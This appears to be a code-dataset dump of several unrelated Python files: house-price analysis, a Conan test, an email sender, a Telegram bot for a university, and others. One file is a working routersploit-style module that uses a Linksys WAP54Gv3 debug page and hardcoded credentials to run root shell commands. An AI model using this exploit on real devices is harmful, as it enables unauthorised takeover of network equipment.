houses_to_buy.loc[i, 'bedrooms'] <= 7) & (houses_to_buy.loc[i, 'bathrooms'] >= 2) & (
houses_to_buy.loc[i, 'bathrooms'] <= 4):
houses_to_buy.loc[i, 'recommendation_to_buy'] = 'high'
else:
houses_to_buy.loc[i, 'recommendation_to_buy'] = 'regular'
for i in range(len(houses_to_buy)):
if (houses_to_buy.loc[i, 'month_day'] >= '03-01') & (houses_to_buy.loc[i, 'month_day'] <= '05-31'):
houses_to_buy.loc[i, 'season'] = 'spring'
elif (houses_to_buy.loc[i, 'month_day'] >= '06-01') & (houses_to_buy.loc[i, 'month_day'] <= '08-31'):
houses_to_buy.loc[i, 'season'] = 'summer'
elif (houses_to_buy.loc[i, 'month_day'] >= '09-01') & (houses_to_buy.loc[i, 'month_day'] <= '11-30'):
houses_to_buy.loc[i, 'season'] = 'fall'
else:
houses_to_buy.loc[i, 'season'] = 'winter'
# solving second question first part (for how much the houses should be sold)
houses_buy_sell = houses_to_buy
houses_buy_sell = houses_buy_sell[houses_buy_sell.status == 'buy']
houses_buy_sell = houses_buy_sell.drop('status', axis=1)
first_column1 = houses_buy_sell.pop('recommendation_to_buy')
houses_buy_sell.insert(0,'recommendation_to_buy',first_column1)
price_median_sell = houses_buy_sell[['price', 'zipcode', 'season']].groupby(
['zipcode', 'season']).median().reset_index()
price_median_sell.columns = ['zipcode', 'season', 'price_median_sell']
houses_buy_sell = pd.merge(houses_buy_sell, price_median_sell, how='inner')
for i in range(len(houses_buy_sell)):
if (houses_buy_sell.loc[i, 'price'] < houses_buy_sell.loc[i, 'price_median_sell']) & (
houses_buy_sell.loc[i, 'recommendation_to_buy'] == 'regular'):
houses_buy_sell.loc[i, 'price_to_sell'] = houses_buy_sell.loc[i, 'price'] + (
houses_buy_sell.loc[i, 'price'] * 0.3)
elif (houses_buy_sell.loc[i, 'price'] < houses_buy_sell.loc[i, 'price_median_sell']) & (
houses_buy_sell.loc[i, 'recommendation_to_buy'] == 'high'):
houses_buy_sell.loc[i, 'price_to_sell'] = houses_buy_sell.loc[i, 'price'] + (
houses_buy_sell.loc[i, 'price'] * 0.375)
elif (houses_buy_sell.loc[i, 'price'] < houses_buy_sell.loc[i, 'price_median_sell']) & (
houses_buy_sell.loc[i, 'recommendation_to_buy'] == 'very_high'):
houses_buy_sell.loc[i, 'price_to_sell'] = houses_buy_sell.loc[i, 'price'] + (
houses_buy_sell.loc[i, 'price'] * 0.45)
elif (houses_buy_sell.loc[i, 'price'] > houses_buy_sell.loc[i, 'price_median_sell']) & (
houses_buy_sell.loc[i, 'recommendation_to_buy'] == 'regular'):
houses_buy_sell.loc[i, 'price_to_sell'] = houses_buy_sell.loc[i, 'price'] + (
houses_buy_sell.loc[i, 'price'] * 0.10)
elif (houses_buy_sell.loc[i, 'price'] > houses_buy_sell.loc[i, 'price_median_sell']) & (
houses_buy_sell.loc[i, 'recommendation_to_buy'] == 'high'):
houses_buy_sell.loc[i, 'price_to_sell'] = houses_buy_sell.loc[i, 'price'] + (
houses_buy_sell.loc[i, 'price'] * 0.125)
else:
houses_buy_sell.loc[i, 'price_to_sell'] = houses_buy_sell.loc[i, 'price'] + (
houses_buy_sell.loc[i, 'price'] * 0.15)
first_column2 = houses_buy_sell.pop('price_to_sell')
houses_buy_sell.insert(4, 'price_to_sell', first_column2)
#solving second question second part (when sell the houses)
for i in range(len(houses_buy_sell)):
houses_buy_sell.loc[i, 'profit'] = (houses_buy_sell.loc[i, 'price_to_sell']) - (houses_buy_sell.loc[i, 'price'])
first_column3 = houses_buy_sell.pop('profit')
houses_buy_sell.insert(5, 'profit', first_column3)
for i in range(len(houses_buy_sell)):
houses_buy_sell.loc[i,'profit_percentage_per_house'] = (((houses_buy_sell.loc[i,'price_to_sell']) - (houses_buy_sell.loc[i,'price'])) / houses_buy_sell.loc[i,'price']) * 100
first_column4 = houses_buy_sell.pop('profit_percentage_per_house')
houses_buy_sell.insert(6,'profit_percentage_per_house',first_column4)
for i in range(len(houses_buy_sell)):
houses_buy_sell.loc[i,'profit_percentage_total'] = ((houses_buy_sell.loc[i,'profit']) / (houses_buy_sell['profit'].sum())) * 100
first_column5 = houses_buy_sell.pop('profit_percentage_total')
houses_buy_sell.insert(7,'profit_percentage_total',first_column5)
time_to_sell = houses_buy_sell[['profit', 'profit_percentage_total', 'season']].groupby(['season']).sum().reset_index()
time_to_sell.columns = ['season', 'profit', 'profit_percentage_total']
df1 = houses_buy_sell[['profit', 'season','recommendation_to_buy','profit_percentage_total']].groupby(['season','recommendation_to_buy']).sum().reset_index()
df2 = houses_buy_sell[['id', 'season','recommendation_to_buy']].groupby(['season','recommendation_to_buy']).count().reset_index()
gen_ind_profit = pd.merge(df1,df2,how='inner')
for i in range(len(gen_ind_profit)):
gen_ind_profit.loc[i,'profit_each_house'] = (gen_ind_profit.loc[i,'profit']) / (gen_ind_profit.loc[i,'id'])
gen_ind_profit.columns = ['season','recommendation_to_buy','total_profit','profit_percentage_total','num_of_houses','mean_profit_each_house']
#criar uma tabela com preco total de compra, total de profit e percentual de diferenca
total_price = houses_buy_sell['price'].sum()
total_profit = houses_buy_sell['profit'].sum()
total = pd.DataFrame([[total_price, total_profit]], columns=['total_price', 'total_profit'])
for i in range(len(total)):
total.loc[i,'profit_percentage'] = ((total.loc[i,'total_profit']) / (total.loc[i,'total_price'])) * 100
# #plot map
# f_recommendation_to_buy = st.sidebar.multiselect('Enter Houses Recommendation to Buy',
# houses_buy_sell['recommendation_to_buy'].sort_values().unique()) # 3.3.1
#
# if f_recommendation_to_buy != []:
# houses_buy_sell_map = houses_buy_sell.loc[houses_buy_sell['recommendation_to_buy'].isin(f_recommendation_to_buy)]
#
# else:
# houses_buy_sell_map = houses_buy_sell.copy()
#
# st.dataframe(houses_buy_sell_map)
# st.write("Here the table is organised by houses recommendation, such as : regular, high and very high. Also it informs other houses characteristics, such as: price to sell, profit, and others.")
#
# st.header('Portfolio Map')
# st.write(" This map shows the location, price and condition of each house.")
# fig = px.scatter_mapbox(houses_buy_sell_map,
# lat = 'lat',
# lon = 'long',
# color = 'condition',
# size = 'price',
# color_continuous_scale = 'Bluered_r',
# size_max = 15,
# zoom = 10)
#
# fig.update_layout(mapbox_style = 'open-street-map')
# fig.update_layout(height = 600, margin = {'r':0, 't':0, 'l':0, 'b':0})
# st.plotly_chart(fig)
#
# st.header('Best Moment to Sell')
# st.dataframe(time_to_sell)
# st.write("According this table, summer presents the highest amount of profit, with more than 30 percent, so it is the best moment to sell houses.")
#
# st.header('General and Individual Profit')
# st.dataframe(gen_ind_profit)
# st.write("Here it is possible to identify the houses profit by season and houses recommendation, also the table shows the mean profit made by each house. ")
# st.write("This table informs that regular houses make the highest profit than the others recommendations in every season, flouting between 15.5 and 27.5 percent, with summer presenting the highest profit andd winter the lowest.")
# st.write("However, dividing the profit by the number of houses, both related to each type of house recommendation, houses very high recommended presents the highest profit among all recommendations. Where summer is at first position with $138675,00 of profit per house; and winter at last position with $88,262.1429.")
#
# st.header('Total Profit Percentage')
# st.dataframe(total)
# st.write("This table represents the total profit by buying and selling all houses recommended to buy. It informs that, by following this project, the company would have a profit of almost 19 percent, Which is more than $771 millions.")
s = data[data['waterfront'] == 'yes']
st.dataframe(s)
st.title('Hypothesis')
c1, c2 = st.beta_columns((1, 1))
st.header('Hypothesis 01: Houses with water view are 20% more expensive, on the average.')
h1 = data[['price', 'waterfront']].groupby('waterfront').mean().reset_index()
# (produto mais caro - produto mais barato) / produto mais barato * 100
h1_answer = ((h1.loc[1, 'price']) - (h1.loc[0, 'price'])) / (h1.loc[0, 'price']) * 100
fig = px.bar(h1, x='waterfront', y='price')
c1.plotly_chart(fig, use_container_width=True)
c2.dataframe(h1)
st.write('False: Houses with water view are {} percent more expensive'.format(h1_answer))
| 49.845133 | 321 | 0.679095 | 1,680 | 11,265 | 4.292857 | 0.194643 | 0.098586 | 0.142402 | 0.095397 | 0.433583 | 0.382557 | 0.288547 | 0.229895 | 0.191902 | 0.186911 | 0 | 0.019719 | 0.171682 | 11,265 | 225 | 322 | 50.066667 | 0.753188 | 0.270661 | 0 | 0.201613 | 0 | 0 | 0.26207 | 0.072986 | 0 | 0 | 0 | 0 | 0 | 1 | 0.008065 | false | 0 | 0.032258 | 0 | 0.048387 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5def7912a76945ddbbf8544b1d7e3567390b9f4 | 1,837 | py | Python | maza/modules/exploits/routers/linksys/wap54gv3_rce.py | ArturSpirin/maza | 56ae6325c08bcedd22c57b9fe11b58f1b38314ca | [
"MIT"
] | 2 | 2020-02-06T20:24:31.000Z | 2022-03-08T19:07:16.000Z | maza/modules/exploits/routers/linksys/wap54gv3_rce.py | ArturSpirin/maza | 56ae6325c08bcedd22c57b9fe11b58f1b38314ca | [
"MIT"
] | null | null | null | maza/modules/exploits/routers/linksys/wap54gv3_rce.py | ArturSpirin/maza | 56ae6325c08bcedd22c57b9fe11b58f1b38314ca | [
"MIT"
] | null | null | null | import re
from maza.core.exploit import *
from maza.core.http.http_client import HTTPClient
class Exploit(HTTPClient):
__info__ = {
"name": "Linksys WAP54Gv3",
"description": "Module exploits remote command execution in Linksys WAP54Gv3 devices. "
"Debug interface allows executing root privileged shell commands is available "
"on dedicated web pages on the device.",
"authors": (
"Phil Purviance", # vulnerability discovery
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
"references": (
"http://seclists.org/bugtraq/2010/Jun/93",
),
"devices": (
"Linksys WAP54Gv3",
)
}
target = OptIP("", "Target IPv4 or IPv6 address")
port = OptPort(80, "Target HTTP port")
def run(self):
if self.check():
print_success("Target is vulnerable")
print_status("Invoking command loop...")
shell(self)
else:
print_error("Target is not vulnerable")
def execute(self, cmd):
data = {"data1": cmd, "command": "ui_debug"}
response = self.http_request(
method="POST",
path="/debug.cgi",
data=data,
auth=("Gemtek", "gemtekswd")
)
if response is None:
return ""
res = re.findall('<textarea rows=30 cols=100>(.+?)</textarea>', response.text, re.DOTALL)
if len(res):
return res[0]
return ""
@mute
def check(self):
mark = utils.random_text(32)
cmd = "echo {}".format(mark)
response = self.execute(cmd)
if mark in response:
return True # target is vulnerable
return False # target is not vulnerable
| 28.261538 | 102 | 0.549809 | 192 | 1,837 | 5.203125 | 0.598958 | 0.032032 | 0.024024 | 0.042042 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.02381 | 0.336962 | 1,837 | 64 | 103 | 28.703125 | 0.796388 | 0.048449 | 0 | 0.078431 | 0 | 0 | 0.317269 | 0.027539 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058824 | false | 0 | 0.058824 | 0 | 0.294118 | 0.058824 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5e08860d8f2994d7150f270e35eaf30cd51d00e | 1,642 | py | Python | client/debian/opt/mirrorcast/hosts.py | 3djake/mirrorcast | 37d19a3b0dcea2529387b0c58245368bdde1f012 | [
"Xnet",
"X11"
] | 36 | 2017-10-30T02:06:24.000Z | 2022-03-08T05:45:58.000Z | client/debian/opt/mirrorcast/hosts.py | 3djake/mirrorcast | 37d19a3b0dcea2529387b0c58245368bdde1f012 | [
"Xnet",
"X11"
] | 5 | 2018-02-06T17:13:14.000Z | 2019-09-11T07:02:01.000Z | client/debian/opt/mirrorcast/hosts.py | 3djake/mirrorcast | 37d19a3b0dcea2529387b0c58245368bdde1f012 | [
"Xnet",
"X11"
] | 6 | 2018-01-13T22:45:46.000Z | 2020-12-13T19:17:33.000Z | # -*- coding: utf-8 -*-
import logging, os, csv, logging.handlers
mirror_logger = logging.getLogger()
mirror_logger.setLevel(logging.DEBUG)
handler = logging.handlers.SysLogHandler(address = '/dev/log')
formatter = logging.Formatter(' mirrorcast - %(name)s - %(levelname)s - %(message)s')
handler.setFormatter(formatter)
mirror_logger.addHandler(handler)
#logging.basicConfig(filename='/opt/mirrorcast/mirrorcast.log',level=logging.DEBUG,format='%(asctime)s %(message)s', datefmt='%d/%m/%Y %I:%M:%S %p')
class Hosts():
def __init__(self):
self.receivers = []
self.receiver = "None"
#load list of receivers from file
try:
with open(os.path.dirname(os.path.abspath(__file__)) + "/receivers") as csvfile:
file = csv.DictReader(csvfile)
for line in file:
self.receivers.append(line)
except:
mirror_logger.error("Failed to load host names")
exit(0)
csvfile.close()
self.aspect = self.receivers[0]['aspect']
#set receiver to the one picked by the user
def set_receiver(self, but, name):
self.receiver = str(but.get_label())
for i in self.receivers:
if i['host'] == self.receiver and but.get_active():
self.aspect = i['aspect']
mirror_logger.info("Receiver set to: " + i['host'] + " Receivers aspect: " + self.aspect)
return
if but.get_active():
self.receiver = "None"
self.aspect = "16:9"
mirror_logger.info("Receiver set to: " + self.receiver)
| 39.095238 | 148 | 0.596833 | 196 | 1,642 | 4.908163 | 0.464286 | 0.074844 | 0.018711 | 0.033264 | 0.060291 | 0.060291 | 0 | 0 | 0 | 0 | 0 | 0.004983 | 0.266748 | 1,642 | 41 | 149 | 40.04878 | 0.79402 | 0.147381 | 0 | 0.0625 | 0 | 0 | 0.130216 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0.03125 | 0 | 0.15625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5e0e3dcd9cc4a1675a98c9eba308c33df18c2ec | 1,858 | py | Python | conans/test/functional/toolchains/meson/test_test.py | JoachimKuebart-TomTom/conan | bf716c094d6b3f5acd727eed3c4b4fe1ad9e1c00 | [
"MIT"
] | 6,205 | 2015-12-01T13:40:05.000Z | 2022-03-31T07:30:25.000Z | conans/test/functional/toolchains/meson/test_test.py | JoachimKuebart-TomTom/conan | bf716c094d6b3f5acd727eed3c4b4fe1ad9e1c00 | [
"MIT"
] | 8,747 | 2015-12-01T16:28:48.000Z | 2022-03-31T23:34:53.000Z | conans/test/functional/toolchains/meson/test_test.py | JoachimKuebart-TomTom/conan | bf716c094d6b3f5acd727eed3c4b4fe1ad9e1c00 | [
"MIT"
] | 961 | 2015-12-01T16:56:43.000Z | 2022-03-31T13:50:52.000Z | import os
import platform
import pytest
import textwrap
from conans.test.assets.sources import gen_function_cpp
from conans.test.functional.toolchains.meson._base import TestMesonBase
@pytest.mark.tool_pkg_config
@pytest.mark.skipif(platform.system() == "Windows", reason="Doesn't work in Windows")
class MesonTest(TestMesonBase):
_test_package_meson_build = textwrap.dedent("""
project('test_package', 'cpp')
hello = dependency('hello', version : '>=0.1')
test_package = executable('test_package', 'test_package.cpp', dependencies: hello)
test('test package', test_package)
""")
_test_package_conanfile_py = textwrap.dedent("""
import os
from conans import ConanFile
from conan.tools.meson import Meson, MesonToolchain
class TestConan(ConanFile):
settings = "os", "compiler", "build_type", "arch"
generators = "pkg_config"
def generate(self):
tc = MesonToolchain(self)
tc.generate()
def build(self):
meson = Meson(self)
meson.configure()
meson.build()
def test(self):
meson = Meson(self)
meson.configure()
meson.test()
""")
def test_reuse(self):
self.t.run("new hello/0.1 -s")
test_package_cpp = gen_function_cpp(name="main", includes=["hello"], calls=["hello"])
self.t.save({os.path.join("test_package", "conanfile.py"): self._test_package_conanfile_py,
os.path.join("test_package", "meson.build"): self._test_package_meson_build,
os.path.join("test_package", "test_package.cpp"): test_package_cpp})
self.t.run("create . hello/0.1@ %s" % self._settings_str)
self._check_binary()
| 32.034483 | 99 | 0.609795 | 212 | 1,858 | 5.141509 | 0.349057 | 0.161468 | 0.06422 | 0.080734 | 0.161468 | 0.06789 | 0.06789 | 0 | 0 | 0 | 0 | 0.004405 | 0.266954 | 1,858 | 57 | 100 | 32.596491 | 0.795888 | 0 | 0 | 0.190476 | 0 | 0 | 0.548439 | 0.037675 | 0 | 0 | 0 | 0 | 0 | 1 | 0.02381 | false | 0 | 0.214286 | 0 | 0.309524 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5e592573090b48a85fca155922e80c7a71aa738 | 1,807 | py | Python | FFL/game/alert.py | LS80/FFL | a853932598ab6c7ae31e2935c83607ff9968ed37 | [
"MIT"
] | null | null | null | FFL/game/alert.py | LS80/FFL | a853932598ab6c7ae31e2935c83607ff9968ed37 | [
"MIT"
] | null | null | null | FFL/game/alert.py | LS80/FFL | a853932598ab6c7ae31e2935c83607ff9968ed37 | [
"MIT"
] | 1 | 2019-07-15T06:40:46.000Z | 2019-07-15T06:40:46.000Z | import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
from email.mime.image import MIMEImage
from email.utils import COMMASPACE, formatdate
from email import encoders
from os.path import basename
class HTMLEmail(object):
def __init__(self, to, sender, name, bcc=None, reply_to=None):
assert type(to)==list
self.to = to
self.sender = sender
self.name = name
if bcc is not None:
self.bcc = [bcc]
else:
self.bcc = []
self.reply_to = reply_to
def send(self, subject, html, smtp_server, images=[], zipfile=None):
msg = MIMEMultipart()
msg['From'] = '{0} <{1}>'.format(self.name, self.sender)
msg['To'] = COMMASPACE.join(self.to)
msg['Date'] = formatdate(localtime=True)
msg['Subject'] = subject
if self.reply_to is not None:
msg['Reply-To'] = self.reply_to
msg.attach(MIMEText(html.encode('utf-8'), 'html', 'utf-8'))
for i, image in enumerate(images):
img = MIMEImage(image.read())
img.add_header('Content-ID', '<image{0}>'.format(i+1))
msg.attach(img)
if zipfile:
zip = MIMEBase('application', 'zip')
zip.set_payload(zipfile.read())
encoders.encode_base64(zip)
zip.add_header('Content-Disposition', 'attachment; filename=%s' % basename(zipfile))
msg.attach(zip)
smtp = smtplib.SMTP(smtp_server)
smtp.sendmail(self.sender, set(self.to+self.bcc), msg.as_string())
smtp.close()
if __name__ == '__main__':
em = HTMLEmail(['test@lee-smith.me.uk'],
"lee@lee-smith.me.uk", "FFL",
bcc="bcc@lee-smith.me.uk", reply_to="reply@lee-smith.me.uk")
em.send('Testing', '<h1>Testing</h1><br><img height="500px" width="700px" src="cid:image1">',
'localhost', images=['test.png'])
| 31.701754 | 95 | 0.660764 | 260 | 1,807 | 4.496154 | 0.388462 | 0.041916 | 0.044482 | 0.041061 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011417 | 0.175982 | 1,807 | 57 | 96 | 31.701754 | 0.773674 | 0 | 0 | 0 | 0 | 0.021277 | 0.17637 | 0.025685 | 0 | 0 | 0 | 0 | 0.021277 | 1 | 0.042553 | false | 0 | 0.170213 | 0 | 0.234043 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5e5a2d0a8855ac8866eb2bdacdaddaecc238eb1 | 16,781 | py | Python | captions.py | marsDurden/UnipdBot | 402b74f6bd876265b952f052e2c132f6aa3c050d | [
"Unlicense"
] | 4 | 2018-04-12T03:39:36.000Z | 2019-11-26T07:52:30.000Z | captions.py | marsDurden/UnipdBot | 402b74f6bd876265b952f052e2c132f6aa3c050d | [
"Unlicense"
] | null | null | null | captions.py | marsDurden/UnipdBot | 402b74f6bd876265b952f052e2c132f6aa3c050d | [
"Unlicense"
] | 1 | 2019-10-07T16:50:48.000Z | 2019-10-07T16:50:48.000Z | import pickle, json, datetime, requests
from bs4 import BeautifulSoup
from geopy.distance import vincenty
from datetime import datetime
from threading import Timer
from config import uniopen_url
class Captions:
def __init__(self, supported_languages, captions_path, quick=True):
self.data = dict()
self.columns = supported_languages
self.default = 'it'
self.path = captions_path
# Update menu every 15 minutes
#self.update_thread = RepeatedTimer(60*15, self.update_mense)
if quick:
try:
self.data = pickle.load( open( self.path + "captions.pkl", "rb" ) )
except FileNotFoundError:
self.update_json()
else:
self.update_json()
self.daily_mensa = {'new': [], 'completed': []}
def stop(self):
self.update_thread.stop()
def update_json(self):
# Load languages json
for filename in self.columns:
with open(self.path + filename + '.json', 'r') as f:
self.data[filename] = json.load(f)
# Utils json
with open(self.path + 'biblio.json', 'r') as f:
self.data['sub_commands'] = json.load(f)
for filename in ['aule_studio', 'mense']:
with open(self.path + filename + '.json', 'r') as f:
a = json.load(f)
self.data['sub_commands'] = {**self.data['sub_commands'], **a}
with open(self.path + 'keyboard.json', 'r') as f:
self.data['keyboard'] = json.load(f)
#print(json.dumps(self.data['sub_commands'], indent=4))
# Save as pickle
pickle.dump( self.data, open( self.path + "captions.pkl", "wb" ) )
def get_reply(self, name, lang=None):
if lang is None: lang = self.default
try:
data = self.data[lang][name]
except KeyError:
data = self.data['sub_commands'][name]
if data['type'] == 0: # Principali
return data['reply']
elif data['type'] == 1: # Biblioteche / aulestudio
string = self.data[lang]['type-1-string']
posti = ''
# Get number of seats left
if name == 'pinali':
n = requests.get("http://zaphod.cab.unipd.it/pinali/PostiLiberiPinali.txt").text.replace(' ','').replace('\n','')
posti = '_' + string[1] + ':_ ' + n + '\n'
elif name == 'metelli':
n = requests.get("http://zaphod.cab.unipd.it/psico/disponibilita.txt").text.replace(' ','').replace('\n','')
posti = '_' + string[1] + ':_ ' + n + '\n'
elif name == 'bibliogeo':
n = requests.get("https://docs.google.com/spreadsheets/d/e/2PACX-1vRG83kEytkR_pNTo-aOLmxnvuQiHXVI926S6ZzIbyv2WOTV3emPF6Y70od3oUR3pJ1JZ8JxyG959vMw/pubhtml?gid=1179896160&single=true")
n = BeautifulSoup(n.text, 'html.parser')
n = n.findAll("td", {"class": "s1"})
posti = '_' + string[1] + ':_ ' + n[0].text + '\n_' + string[2] + ':_ ' + n[1].text + '\n'
elif name == 'matematica':
n = requests.get("https://wss.math.unipd.it/biblioteca/posti_liberi.txt").text.replace('\n','')
if n != 'dato non disponibile': posti = '_' + string[1] + ':_ ' + n + '\n'
reply = string[0].format(data['title'], posti, data['address'], data['timetable'])
dict_days = self.data[lang]['orario']['reply']['days']
list_days = list(dict_days)
for i, day in enumerate(dict_days.values()):
reply = reply.replace(list_days[i], day)
return reply
elif data['type'] == 2: # Mense
list_string = self.data[lang]['type-2-string']
# Opened or closed pranzo/cena
pranzo = '*' + list_string[1] + '* ' + list_string[3].format(data['pranzo']['apertura'], data['pranzo']['chiusura']) if data['pranzo']['aperta'] else '*' + list_string[2] + '*'
cena = '*' + list_string[1] + '* ' + list_string[3].format(data['cena']['apertura'], data['cena']['chiusura']) if data['cena']['aperta'] else '*' + list_string[2] + '*'
reply = list_string[0].format(data['nome'], data['indirizzo'], pranzo, cena)
# Menu
if datetime.utcnow().hour < 15: # Pranzo
if data['pranzo']['primo'] != '':
reply += list_string[4].format(data['pranzo']['primo'], data['pranzo']['secondo'], data['pranzo']['contorno'])
if data['pranzo']['dessert'] != '':
reply += list_string[5].format(data['pranzo']['dessert'])
else: # Cena
if data['cena']['primo'] != '':
reply += list_string[4].format(data['cena']['primo'], data['cena']['secondo'], data['cena']['contorno'])
if data['cena']['dessert'] != '':
reply += list_string[5].format(data['cena']['dessert'])
return reply
def get_keyboard(self, name, lang=None, isGroup=False):
if lang is None: lang = self.default
# Keyboards
if name == 'home':
if not isGroup:
markup = [['orario', 'mensa'],
['biblioteca', 'aulastudio'],
['diritto_studio', 'udupadova'],
['vicino a te', 'botinfo']]
else:
markup = [['orario'],
['mensa', 'aulastudio'],
['biblioteca', 'udupadova'],
['diritto_studio', 'botinfo']]
elif name == 'mensa':
markup = [["sanfrancesco", "piovego"],
["agripolis", "acli"],
["belzoni", "murialdo"],
["forcellini", "home"]]
elif name == 'aulastudio':
markup = [["jappelli", "pollaio"],
["titolivio", "galilei"],
["marsala", "viavenezia"],
["aulaSanGaetano", "reset"],
["home"]]
elif name == 'biblioteca':
markup = [["bibliodiritto", "filosofia", "ingegneria"],
["someda", "maldura", "matematica"],
["storia", "metelli", "pinali"],
["caborin", "cuzabarella", "universitaria"],
["bibliochimica", "agribiblio", "bibliogeo"],
["sangaetano", "liviano", "bibliofarmacia"],
["vbranca", "home"]]
elif name == 'diritto_studio':
markup = [["borse", "tasse"],
["200ore", "informami"],
["home"]]
elif name == 'udupadova':
markup = [["faqlibretto", "erasmus"],
["controguida", "cambiocorso"],
["assembleaudu", "sedeudu"],
["home"]]
else:
data = self.data['keyboard'][name]
# Sostituisce i nomi dei bottoni inline
if data['inline']:
try:
for i, item in enumerate(self.data[lang][name]['markup'].values()):
data['markup'][str(i)]['text'] = item
except KeyError:
pass
return [_ for _ in data.values()]
# Sostituisce i nomi dei comandi nella tastiera
for i, row in enumerate(markup):
for j, caption in enumerate(row):
try:
markup[i][j] = self.data[lang]['commands'][caption]
except (KeyError, TypeError):
try:
markup[i][j] = self.data[lang]['sub_commands'][caption]
except (KeyError, TypeError):
pass
if ' ' not in markup[i][j]: markup[i][j] = '/' + markup[i][j]
return markup
def get_command_handlers(self, key):
reply = []
if key == 'sub_commands':
commands = []
for lang in self.columns:
for item in self.data[lang]['sub_commands'].values():
commands.append(item)
else:
commands = [self.data[lang]['commands'][key] for lang in self.columns]
for item in commands:
if item not in reply:
reply.append(item)
return reply
def inverse_command_map(self, key, lang=None):
if lang == None: lang = self.default
my_map = self.data[lang]['sub_commands']
inv_map = {v: k for k, v in my_map.items()}
return inv_map[key]
def reply_position(self, usrCoord, lang=None):
if lang is None: lang = self.default
markup = []; nearDist = []; unit = ['km' for _ in range(3)]
distDict = {'mensa': {}, 'aulastudio': {}, 'biblioteca': {}}
tmp = distDict
today = str(datetime.today().weekday())
for item in [s.replace('/','') for t in self.get_keyboard('mensa', lang) for s in t]:
if item != 'home':
pranzo = self.data['sub_commands'][item]['pranzo']['aperta']
cena = self.data['sub_commands'][item]['cena']['aperta']
if cena or pranzo:
distDict['mensa'][item] = {"lat": self.data['keyboard'][item]['lat'], "lon": self.data['keyboard'][item]['lon']}
for item in [s.replace('/','') for t in self.get_keyboard('biblioteca', lang) for s in t]:
if item != 'home':
# TODO controllare che la biblio sia aperta
distDict['biblioteca'][item] = {"lat": self.data['keyboard'][item]['lat'], "lon": self.data['keyboard'][item]['lon']}
for item in [s.replace('/','') for t in self.get_keyboard('biblioteca', lang) for s in t]:
if item != 'home':
distDict['aulastudio'][item] = {"lat": self.data['keyboard'][item]['lat'], "lon": self.data['keyboard'][item]['lon']}
for key in distDict:
for i in distDict[key]:
lat = distDict[key][i]['lat']
lon = distDict[key][i]['lon']
tmp[key][i] = vincenty((usrCoord['latitude'],
usrCoord['longitude']),
(lat, lon)).kilometers
nearMensa = min(tmp['mensa'], key=tmp['mensa'].get)
nearAula = min(tmp['aulastudio'], key=tmp['aulastudio'].get)
nearBiblio = min(tmp['biblioteca'], key=tmp['biblioteca'].get)
nearDist.append(float(tmp['mensa'][nearMensa]))
nearDist.append(float(tmp['aulastudio'][nearAula]))
nearDist.append(float(tmp['biblioteca'][nearBiblio]))
for i in range(len(nearDist)):
if nearDist[i] < 1:
nearDist[i] = nearDist[i]*1000
unit[i] = 'm'
str_lang = self.data[lang]['position']['reply']
line1 = "- `" + str_lang[0] + "` " + str_lang[1] + ": *{}*, " + str_lang[2] + " _{:.0f}_ " + unit[0] + ".\n\n"
line1 = line1.format(self.data['sub_commands'][nearMensa]['nome'], nearDist[0])
line2 = "- `" + str_lang[3] + "` " + str_lang[1] + ": *{}*, " + str_lang[2] + " _{:.0f}_ " + unit[1] + ".\n\n"
line2 = line2.format(self.data['sub_commands'][nearAula]['title'], nearDist[1])
line3 = "- `" + str_lang[4] + "` " + str_lang[1] + ": *{}*, " + str_lang[2] + " _{:.0f}_ " + unit[2] + ".\n\n"
line3 = line3.format(self.data['sub_commands'][nearBiblio]['title'], nearDist[2])
reply = line1 + line2 + line3
markup.append(['/'+nearMensa])
markup.append(['/'+nearAula])
markup.append(['/'+nearBiblio])
markup.append(['/home'])
return reply, markup
def update_mense(self):
# Update Mense
html = requests.get('http://www.esupd.gov.it/it')
#print(html.headers['Date'])
html = BeautifulSoup(html.content, "html.parser")
rows = html.find('table',attrs={"summary":"Di seguito sono illustrate le mense con i loro tempi di attesa e i link ai menu, ove disponibili"}).find_all("tr")
#for tmp in rows:
#print(tmp.text)
mense = dict()
for row in rows:
name = row.find('th').text.lower().replace(' ','')
if name == 'piox': name = 'acli'
elif name == 'nordpiovego': name = 'piovego'
if name != '':
mense[name] = {"type": 2, "pranzo": {}, "cena": {}}
for i, cell in enumerate(row.find_all('td')):
if i == 0: # Pranzo
mense[name]['pranzo'] = {"aperta": cell.span['class'][0] == 'open', \
"primo": "", "secondo": "", "contorno": "", "dessert": ""}
elif i == 1: # Cena
mense[name]['cena'] = {"aperta": cell.span['class'][0] == 'open', \
"primo": "", "secondo": "", "contorno": "", "dessert": ""}
